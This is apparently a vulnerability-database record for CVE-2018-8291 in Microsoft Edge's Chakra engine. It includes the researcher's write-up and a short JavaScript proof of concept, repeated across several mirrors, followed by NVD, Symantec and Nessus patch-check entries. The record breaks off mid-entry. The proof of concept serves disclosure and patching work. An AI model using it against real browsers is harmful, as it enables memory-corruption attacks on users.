Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion
2018-08-17T00:00:00
ID EDB-ID:45215 Type exploitdb Reporter Exploit-DB Modified 2018-08-17T00:00:00
Description
Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion. CVE-2018-8291. Dos exploit for Windows platform. Tags: Type Confusion
/*
Here's the method.
template <typename TPropertyIndex>
template <typename TPropertyIndexFrom>
void DictionaryPropertyDescriptor<TPropertyIndex>::CopyFrom(DictionaryPropertyDescriptor<TPropertyIndexFrom>& descriptor)
{
this->Attributes = descriptor.Attributes;
this->Data = (descriptor.Data == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Data;
this->Getter = (descriptor.Getter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Getter;
this->Setter = (descriptor.Setter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Setter;
this->IsAccessor = descriptor.IsAccessor;
#if ENABLE_FIXED_FIELDS
this->IsInitialized = descriptor.IsInitialized;
this->IsFixed = descriptor.IsFixed;
this->UsedAsFixed = descriptor.UsedAsFixed;
#endif
}
Given its name, I think that the method is supposed to copy all the fields from another descriptor to "this". But it actually leaves some fields uncopied. The "IsShadowed" field is one of them which indicates that a Let or Const variable has been declared in the global object with the same name as the name of a property of the global object. This lack of copying the "IsShadowed" field can lead to type confusion like in the PoC or uninitialized pointer dereference.
PoC:
*/
let x = 1;
this.x = 0x1234; // IsShadowed
// Convert to BigDictionaryTypeHandler, CopyFrom will be used in the process.
for (let i = 0; i < 0x10000; i++) {
this['a' + i] = 1;
}
// Set IsAccessor
this.__defineSetter__('x', () => {});
// Type confusion
this.x;
{"id": "EDB-ID:45215", "hash": "5201054c1e5a212cf6955b6f3e8d49c3", "type": "exploitdb", "bulletinFamily": "exploit", "title": "Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion", "description": "Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion. CVE-2018-8291. Dos exploit for Windows platform. Tags: Type Confusion", "published": "2018-08-17T00:00:00", "modified": "2018-08-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://www.exploit-db.com/exploits/45215/", "reporter": "Exploit-DB", "references": [], "cvelist": ["CVE-2018-8291"], "lastseen": "2018-08-17T17:40:41", "history": [], "viewCount": 10, "enchantments": {"score": {"value": 4.7, "vector": "NONE", "modified": "2018-08-17T17:40:41"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2018-8291"]}, {"type": "symantec", "idList": ["SMNTC-104637"]}, {"type": "zdt", "idList": ["1337DAY-ID-30912"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:148983"]}, {"type": "nessus", "idList": ["SMB_NT_MS18_JUL_INTERNET_EXPLORER.NASL", "SMB_NT_MS18_JUL_4338829.NASL", "SMB_NT_MS18_JUL_4338815.NASL", "SMB_NT_MS18_JUL_4338818.NASL", "SMB_NT_MS18_JUL_4338814.NASL", "SMB_NT_MS18_JUL_4338826.NASL", "SMB_NT_MS18_JUL_4338825.NASL", "SMB_NT_MS18_JUL_4338819.NASL"]}, {"type": "thn", "idList": ["THN:482268607F3476C1920BBF880270C854"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310813652", "OPENVAS:1361412562310813645", "OPENVAS:1361412562310813648", "OPENVAS:1361412562310813649", "OPENVAS:1361412562310813647", "OPENVAS:1361412562310813651", "OPENVAS:1361412562310813650"]}, {"type": "kaspersky", "idList": ["KLA11290", "KLA11288"]}, {"type": "talosblog", "idList": ["TALOSBLOG:64097F241B66E90D3723AFE8991AFAB4"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:D2DE4A375F3757187EBBB5A3EA061E42"]}], "modified": "2018-08-17T17:40:41"}, "vulnersScore": 4.7}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/45215/", "sourceData": "/*\r\nHere's the method.\r\n template <typename TPropertyIndex>\r\n template <typename TPropertyIndexFrom>\r\n void DictionaryPropertyDescriptor<TPropertyIndex>::CopyFrom(DictionaryPropertyDescriptor<TPropertyIndexFrom>& descriptor)\r\n {\r\n this->Attributes = descriptor.Attributes;\r\n this->Data = (descriptor.Data == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Data;\r\n this->Getter = (descriptor.Getter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Getter;\r\n this->Setter = (descriptor.Setter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Setter;\r\n this->IsAccessor = descriptor.IsAccessor;\r\n\r\n#if ENABLE_FIXED_FIELDS\r\n this->IsInitialized = descriptor.IsInitialized;\r\n this->IsFixed = descriptor.IsFixed;\r\n this->UsedAsFixed = descriptor.UsedAsFixed;\r\n#endif\r\n }\r\n\r\nGiven its name, I think that the method is supposed to copy all the fields from another descriptor to \"this\". But it actually leaves some fields uncopied. The \"IsShadowed\" field is one of them which indicates that a Let or Const variable has been declared in the global object with the same name as the name of a property of the global object. This lack of copying the \"IsShadowed\" field can lead to type confusion like in the PoC or uninitialized pointer dereference.\r\n\r\nPoC:\r\n*/\r\n\r\nlet x = 1;\r\n\r\nthis.x = 0x1234; // IsShadowed\r\n\r\n// Convert to BigDictionaryTypeHandler, CopyFrom will be used in the process.\r\nfor (let i = 0; i < 0x10000; i++) {\r\n this['a' + i] = 1;\r\n}\r\n\r\n// Set IsAccessor\r\nthis.__defineSetter__('x', () => {});\r\n\r\n// Type confusion\r\nthis.x;", "osvdbidlist": [], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:20:29", "bulletinFamily": "NVD", "description": "A remote code execution vulnerability exists in the way the scripting engine handles objects in memory in Microsoft browsers, aka \"Scripting Engine Memory Corruption Vulnerability.\" This affects ChakraCore, Internet Explorer 11, Microsoft Edge. This CVE ID is unique from CVE-2018-8242, CVE-2018-8283, CVE-2018-8287, CVE-2018-8288, CVE-2018-8296, CVE-2018-8298.", "modified": "2018-09-05T14:39:00", "id": "CVE-2018-8291", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-8291", "published": "2018-07-11T00:29:00", "title": "CVE-2018-8291", "type": "cve", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}], "symantec": [{"lastseen": "2018-07-10T23:26:12", "bulletinFamily": "software", "description": "### Description\n\nMicrosoft Internet Explorer and Edge are prone to an remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Successfully exploiting this issue allows remote attackers to execute arbitrary code in the context of the affected application.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "modified": "2018-07-10T00:00:00", "published": "2018-07-10T00:00:00", "id": "SMNTC-104637", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/104637", "title": "Microsoft Internet Explorer and Edge CVE-2018-8291 Remote Memory Corruption Vulnerability", "type": "symantec", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-08-17T22:21:24", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category dos / poc", "modified": "2018-08-17T00:00:00", "published": "2018-08-17T00:00:00", "id": "1337DAY-ID-30912", "href": "https://0day.today/exploit/description/30912", "title": "Microsoft Edge Chakra JIT - DictionaryPropertyDescriptor::CopyFrom Type Confusion Exploit", "type": "zdt", "sourceData": "/*\r\nHere's the method.\r\n template <typename TPropertyIndex>\r\n template <typename TPropertyIndexFrom>\r\n void DictionaryPropertyDescriptor<TPropertyIndex>::CopyFrom(DictionaryPropertyDescriptor<TPropertyIndexFrom>& descriptor)\r\n {\r\n this->Attributes = descriptor.Attributes;\r\n this->Data = (descriptor.Data == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Data;\r\n this->Getter = (descriptor.Getter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Getter;\r\n this->Setter = (descriptor.Setter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Setter;\r\n this->IsAccessor = descriptor.IsAccessor;\r\n \r\n#if ENABLE_FIXED_FIELDS\r\n this->IsInitialized = descriptor.IsInitialized;\r\n this->IsFixed = descriptor.IsFixed;\r\n this->UsedAsFixed = descriptor.UsedAsFixed;\r\n#endif\r\n }\r\n \r\nGiven its name, I think that the method is supposed to copy all the fields from another descriptor to \"this\". But it actually leaves some fields uncopied. The \"IsShadowed\" field is one of them which indicates that a Let or Const variable has been declared in the global object with the same name as the name of a property of the global object. This lack of copying the \"IsShadowed\" field can lead to type confusion like in the PoC or uninitialized pointer dereference.\r\n \r\nPoC:\r\n*/\r\n \r\nlet x = 1;\r\n \r\nthis.x = 0x1234; // IsShadowed\r\n \r\n// Convert to BigDictionaryTypeHandler, CopyFrom will be used in the process.\r\nfor (let i = 0; i < 0x10000; i++) {\r\n this['a' + i] = 1;\r\n}\r\n \r\n// Set IsAccessor\r\nthis.__defineSetter__('x', () => {});\r\n \r\n// Type confusion\r\nthis.x;\n\n# 0day.today [2018-08-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/30912"}], "packetstorm": [{"lastseen": "2018-08-18T01:54:27", "bulletinFamily": "exploit", "description": "", "modified": "2018-08-17T00:00:00", "published": "2018-08-17T00:00:00", "id": "PACKETSTORM:148983", "href": "https://packetstormsecurity.com/files/148983/Microsoft-Edge-Chakra-DictionaryPropertyDescriptor-CopyFrom-Failed-Copy.html", "title": "Microsoft Edge Chakra DictionaryPropertyDescriptor::CopyFrom Failed Copy", "type": "packetstorm", "sourceData": "`Microsoft Edge: Chakra: DictionaryPropertyDescriptor::CopyFrom doesn't copy all fields \n \nCVE-2018-8291 \n \n \nHere's the method. \ntemplate <typename TPropertyIndex> \ntemplate <typename TPropertyIndexFrom> \nvoid DictionaryPropertyDescriptor<TPropertyIndex>::CopyFrom(DictionaryPropertyDescriptor<TPropertyIndexFrom>& descriptor) \n{ \nthis->Attributes = descriptor.Attributes; \nthis->Data = (descriptor.Data == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Data; \nthis->Getter = (descriptor.Getter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Getter; \nthis->Setter = (descriptor.Setter == DictionaryPropertyDescriptor<TPropertyIndexFrom>::NoSlots) ? NoSlots : descriptor.Setter; \nthis->IsAccessor = descriptor.IsAccessor; \n \n#if ENABLE_FIXED_FIELDS \nthis->IsInitialized = descriptor.IsInitialized; \nthis->IsFixed = descriptor.IsFixed; \nthis->UsedAsFixed = descriptor.UsedAsFixed; \n#endif \n} \n \nGiven its name, I think that the method is supposed to copy all the fields from another descriptor to \"this\". But it actually leaves some fields uncopied. The \"IsShadowed\" field is one of them which indicates that a Let or Const variable has been declared in the global object with the same name as the name of a property of the global object. This lack of copying the \"IsShadowed\" field can lead to type confusion like in the PoC or uninitialized pointer dereference. \n \nPoC: \nlet x = 1; \n \nthis.x = 0x1234; // IsShadowed \n \n// Convert to BigDictionaryTypeHandler, CopyFrom will be used in the process. \nfor (let i = 0; i < 0x10000; i++) { \nthis['a' + i] = 1; \n} \n \n// Set IsAccessor \nthis.__defineSetter__('x', () => {}); \n \n// Type confusion \nthis.x; \n \n \nThis bug is subject to a 90 day disclosure deadline. After 90 days elapse \nor a patch has been made broadly available (whichever is earlier), the bug \nreport will become visible to the public. \n \n \n \n \nFound by: lokihardt \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/148983/GS20180817193254.txt"}], "nessus": [{"lastseen": "2020-01-01T01:43:10", "bulletinFamily": "scanner", "description": "The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)", "modified": "2020-01-02T00:00:00", "id": "SMB_NT_MS18_JUL_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/110991", "published": "2018-07-10T00:00:00", "title": "Security Updates for Internet Explorer (July 2018)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110991);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2019/06/28 11:31:59\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8242\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8291\",\n \"CVE-2018-8296\"\n );\n script_bugtraq_id(\n 104620,\n 104622,\n 104634,\n 104636,\n 104637,\n 104638\n );\n script_xref(name:\"MSKB\", value:\"4339093\");\n script_xref(name:\"MSKB\", value:\"4338815\");\n script_xref(name:\"MSKB\", value:\"4338830\");\n script_xref(name:\"MSKB\", value:\"4338818\");\n script_xref(name:\"MSFT\", value:\"MS18-4339093\");\n script_xref(name:\"MSFT\", value:\"MS18-4338815\");\n script_xref(name:\"MSFT\", value:\"MS18-4338830\");\n script_xref(name:\"MSFT\", value:\"MS18-4338818\");\n\n script_name(english:\"Security Updates for Internet Explorer (July 2018)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\");\n # https://support.microsoft.com/en-us/help/4339093/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?156c87ff\");\n # https://support.microsoft.com/en-us/help/4338815/windows-81-update-kb4338815\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e0106ae8\");\n # https://support.microsoft.com/en-us/help/4338830/windows-server-2012-update-kb4338830\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0c32edc0\");\n # https://support.microsoft.com/en-us/help/4338818/windows-7-update-kb4338818\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?d021f588\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released the following security updates to address this issue: \n -KB4339093\n -KB4338815\n -KB4338830\n -KB4338818\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-8296\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS18-07';\nkbs = make_list(\n '4338815', # Win 8.1 /2012 R2\n '4338818', # Win 7 / 2008 R2\n '4338830', # Server 2012\n '4339093' # IE Cumulative\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n # fix on x32 is 19061 and on x64 is 19062\n # can use 19061 to flag both\n hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.19061\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4339093\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22500\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4339093\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.19081\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4339093\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21250\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4339093\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4339093 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4338815 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS18-07', kb:'4338815', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4338830 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS18-07', kb:'4338830', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4338818 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS18-07', kb:'4338818', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-01T01:43:10", "bulletinFamily": "scanner", "description": "The remote Windows host is missing security update 4338829.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the vulnerability could cause a\n target system to stop responding. (CVE-2018-8309)\n\n - A remote code execution vulnerability exists in the way\n that the Chakra scripting engine handles objects in\n memory in Microsoft Edge. The vulnerability could\n corrupt memory in such a way that an attacker could\n execute arbitrary code in the context of the current\n user. An attacker who successfully exploited the\n vulnerability could gain the same user rights as the\n current user. (CVE-2018-8280, CVE-2018-8290)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Windows kernel-mode driver fails to\n properly handle objects in memory. An attacker who\n successfully exploited this vulnerability could run\n arbitrary code in kernel mode. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2018-8282)\n\n - A denial of service vulnerability exists when Windows\n improperly handles File Transfer Protocol (FTP)\n connections. An attacker who successfully exploited the\n vulnerability could cause a target system to stop\n responding. (CVE-2018-8206)\n\n - A remote code execution vulnerability exists when\n Microsoft Edge improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that enables an attacker to execute arbitrary code in\n the context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2018-8125)\n\n - A security feature bypass vulnerability exists in Device\n Guard that could allow an attacker to inject malicious\n code into a Windows PowerShell session. An attacker who\n successfully exploited this vulnerability could inject\n code into a trusted PowerShell process to bypass the\n Device Guard Code Integrity policy on the local machine.\n (CVE-2018-8222)\n\n - A security feature bypass vulnerability exists when\n Microsoft Internet Explorer improperly handles requests\n involving UNC resources. An attacker who successfully\n exploited the vulnerability could force the browser to\n load data that would otherwise be restricted.\n (CVE-2018-0949)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel fails to properly handle objects in\n memory. An attacker who successfully exploited this\n vulnerability could run arbitrary code in kernel mode.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. (CVE-2018-8308)\n\n - A security feature bypass vulnerability exists when\n Microsoft WordPad improperly handles embedded OLE\n objects. An attacker who successfully exploited the\n vulnerability could bypass content blocking. In a file-\n sharing attack scenario, an attacker could provide a\n specially crafted document file designed to exploit the\n vulnerability, and then convince a user to open the\n document file. The security update addresses the\n vulnerability by correcting how Microsoft WordPad\n handles input. (CVE-2018-8307)\n\n - An elevation of privilege vulnerability exists in .NET\n Framework which could allow an attacker to elevate their\n privilege level. (CVE-2018-8202)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Kernel API enforces permissions. An\n attacker who successfully exploited the vulnerability\n could impersonate processes, interject cross-process\n communication, or interrupt system functionality.\n (CVE-2018-8313)\n\n - A remote code execution vulnerability exists in the way\n the scripting engine handles objects in memory in\n Microsoft browsers. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8287, CVE-2018-8288, CVE-2018-8291)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2018-8284)\n\n - An elevation of privilege vulnerability exists when\n Windows fails a check, allowing a sandbox escape. An\n attacker who successfully exploited the vulnerability\n could use the sandbox escape to elevate privileges on an\n affected system. This vulnerability by itself does not\n allow arbitrary code execution. However, the\n vulnerability could allow arbitrary code to run if an\n attacker uses it in combination with another\n vulnerability, such as a remote code execution\n vulnerability or another elevation of privilege\n vulnerability, that can leverage the elevated privileges\n when code execution is attempted. The security update\n addresses the vulnerability by correcting how Windows\n file picker handles paths. (CVE-2018-8314)\n\n - A security feature bypass vulnerability exists when\n Microsoft .NET Framework components do not correctly\n validate certificates. An attacker could present expired\n certificates when challenged. The security update\n addresses the vulnerability by ensuring that .NET\n Framework components correctly validate certificates.\n (CVE-2018-8356)", "modified": "2020-01-02T00:00:00", "id": "SMB_NT_MS18_JUL_4338829.NASL", "href": "https://www.tenable.com/plugins/nessus/110986", "published": "2018-07-10T00:00:00", "title": "KB4338829: Windows 10 July 2018 Security Update", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110986);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\n \"CVE-2018-0949\",\n \"CVE-2018-8125\",\n \"CVE-2018-8202\",\n \"CVE-2018-8206\",\n \"CVE-2018-8222\",\n \"CVE-2018-8242\",\n \"CVE-2018-8280\",\n \"CVE-2018-8282\",\n \"CVE-2018-8284\",\n \"CVE-2018-8287\",\n \"CVE-2018-8288\",\n \"CVE-2018-8290\",\n \"CVE-2018-8291\",\n \"CVE-2018-8296\",\n \"CVE-2018-8304\",\n \"CVE-2018-8307\",\n \"CVE-2018-8308\",\n \"CVE-2018-8309\",\n \"CVE-2018-8313\",\n \"CVE-2018-8314\",\n \"CVE-2018-8356\"\n );\n script_bugtraq_id(\n 104617,\n 104620,\n 104622,\n 104623,\n 104629,\n 104631,\n 104634,\n 104635,\n 104636,\n 104637,\n 104638,\n 104642,\n 104644,\n 104648,\n 104652,\n 104664,\n 104665,\n 104667,\n 104668,\n 104669,\n 104670\n );\n script_xref(name:\"MSKB\", value:\"4338829\");\n script_xref(name:\"MSFT\", value:\"MS18-4338829\");\n\n script_name(english:\"KB4338829: Windows 10 July 2018 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4338829.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2018-8242, CVE-2018-8296)\n\n - A denial of service vulnerability exists in Windows\n Domain Name System (DNS) DNSAPI.dll when it fails to\n properly handle DNS responses. An attacker who\n successfully exploited the vulnerability could cause a\n system to stop responding. Note that the denial of\n service condition would not allow an attacker to execute\n code or to elevate user privileges. However, the denial\n of service condition could prevent authorized users from\n using system resources. (CVE-2018-8304)\n\n - A denial of service vulnerability exists when Windows\n improperly handles objects in memory. An attacker who\n successfully exploited the 